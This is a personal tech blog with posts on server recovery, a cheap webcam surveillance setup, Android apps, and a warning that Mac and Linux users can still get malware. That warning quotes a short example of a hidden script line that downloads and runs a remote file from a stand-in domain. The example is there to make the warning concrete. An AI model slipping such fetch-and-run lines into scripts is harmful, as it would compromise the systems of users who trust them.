.InsecureSystem.

My linode was involved in some kind of horrific serverroom accident which left it in a pretty funky state once they got the surviving disks into a working box. Luckily linode has its own recovery live image called "finnix", pretty spiffy. Boot with that, chroot into gentoo, and see if i can bring it back from the dead...

Since I keep forgetting the sequence,
im just gonna leave this here:

So after messing with the netbook surveillance thing for a while I decided to actually make a more permanent solution. I went out and got a cheap little webcam, stuck it in my front window to monitor the front of the house, and using the same basic config on the server in my living-room got it all rigged up to record anything that happens throughout the day. The next step is to setup dns for my home IP again so i can check in on the camera while im not home, and maybe to setup something like dropbox so the video captures it creates are stored in "the cloud". ll in all its a pretty decent home surveillance setup for under 50 bucks.

Setup an ubuntu server and messed with the ubuntu firewall (since it overrides iptables, and iptables overrides it... this is just dumb, but whatever). Nothing much is new, but for those of you using portsentry to secure your ubuntu box, ROUTE_KILL should be "/usr/sbin/ufw deny from $TARGET$".

Facebook app for the android phone is pretty nifty, uploading photos straight from the program is nice and smooth. Yeah... using facebook, and blogging, and twittering... I've been corrupted by the internet.

Ive started a fun little side project of turning a netbook into a portable home security terminal. I'm starting simple, of-course, with a stationary (but portable) surveillance camera / dvr with two way audio.

The idea just originated with the fact that in our house you can hear someone at the door unless you're in the living-room and we typically leave the wooden door open with the security screen closed, so a camera could see through the screen if one were placed there and I could then have a feed in any room of the house or in the backyard showing me the front door. However this may evolve into something more permanent and less hackey as recently a ups shipment that was scanned in as delivered to my house, was no where to be found.

The netbook is a 1000HA eeepc and is currently running backtrack4, effectively ubuntu linux 9.10, and has essentially all the hardware one would desire in a cheap home surveillance camera.

• decent camera - check.
• audio out - check
• microphone - check
• wifi - check
• 6+ hours of battery life - check

I stumbled upon a package in ubuntu called "motion" which is a dvr/webserver for webcam based video inputs, and records images/video based on motion-detection software... perfect!

First, Install the package

Next, edit the config file
I set the following values:

• width 352
• height 288
• framerate 10
• threshold 500 (much higher sensitivity for motion based recording)
• target_dir /e/dvr (which is a mounted network share to a storage server)
• webcam_maxrate 10

Finally just restart the motion server and it will be streaming whatever the camera is pointed at on port 8081, and will record images/videos whenever motion beyond the threshold is detected.

• For those of us with rooted Droid phones, this app makes installing the recovery system, specialized themes, and all the base files needed for flashing new roms to the device as easy as pressing a few buttons.

• Podcast browser/downloader/player that keeps an updated list of subscriptions and downloads the latest episodes for you in the background. Really great for downloading your favorite podcasts to listen to on the road.

• For the want of an accessible sd-card... AndFTP is a simple and effective ftp client for android that makes moving files to and from the phone wireless and easy without the need for bluetooth.

• The coolest of the bunch, this uses paired software on the phone as well as your computer to enable tethering, and it doesn't even need root to do it. The software on your computer sets up a TUN modem driver and the tether is done through usb or bluetooth.

• So I used to hate the very existence of twitter, but lately I've found it to be an invaluable source of information, and Twidroid lets me keep up with the constant feed while on the go.

• Mostly as a byproduct of being a college student and needing to occasionally buy insanely overpriced books, this has become a necessity. Scan the book's (or anything's) barcode with your camera, and shopsavvy will find the lowest offered prices locally as well as online.

• Encrypted vault for sensitive information. I actually don't use it for passwords, but for other sensitive information that i need to remember details of while keeping secure. This app has tons of templates and uses a master password to unlock.

• We don't have an audible.com app yet, but Astro Player will play audiobooks (actually it will play just about any audio format I can find), and its also good to have a spare audio player so that you can play music on the normal player without loosing you place in the audiobook in Astro.

• It's Linux, we must have ssh.

• Fun and handy app that graphically displays local wifi signals on a graph, showing their relative strength and which channels they are on or interfere with. Very useful when setting up a new access point.

Get a Mac so that you don't have to worry about viruses...

Linux is immune to malware...

Only windows users have to worry about security software...


If I were a "bad guy", MacOSX and to a lesser extent, Linux, are the platforms I would be targeting right now for spreading virii and botnets. This is simply because you can depend on the majority of end users to naively click anything on the web, follow bogus instructions, and not have an antivirus installed, since they're running a system that's "invulnerable".

Since most malware these days that people get infected with is designed not to exploit the system on its own to gain access, but merely to trick the user into installing it themselves, the less paranoid your target is the more likely they are to get infected.

Trojan .dmg file for OSX:

 

Linux is a little harder due to the repository system, users dont typically download software off of a website. However, alot of system fixes, driver fixes, or advanced setups use shell scripts and those scripts almost always require root permissions. If you grab someones several hundred line script to setup/fix somthing for you, whats stopping them from having embedded a couple lines which fetch and install a malicious piece of software as well? Unless you read the script entirely and know what you are doing, or it came from a well reviewed source, there is no assurance that it is safe to use.

example... in the middle of some random script you found is this: 
...
wget fakedomain.cn/x/tmp.sh
sh tmp.sh
rm tmp.sh
...

you gave root/sudoer permission to the script initially (to fix your problem, get that driver to work, setup a service for you, etc..) , and you have no idea what tmp.sh does. Most users wont notice the new daemon that's running in the background if its not using up too much in the way of resources, just like in Windows.

Stop telling people to use either system so that they don't need to worry about viruses. Unix systems are more secure in general, there is less malware out there for them right now, but they are not immune to being infected.

All computer users should exercise some common sense and maintain a bit of healthy distrust.

Testing out the blogaway android app on my Motorola droid. it seems pretty slick and feature rich so far. Trying its image upload, which is tied into picasa, with a picture of my street after a recent rain storm.

@SecurityTube pointed out this three part series on how to use Iptables in Linux, and, since they contain some awesome info for anyone interested in Linux security, I'm embedding them here as well.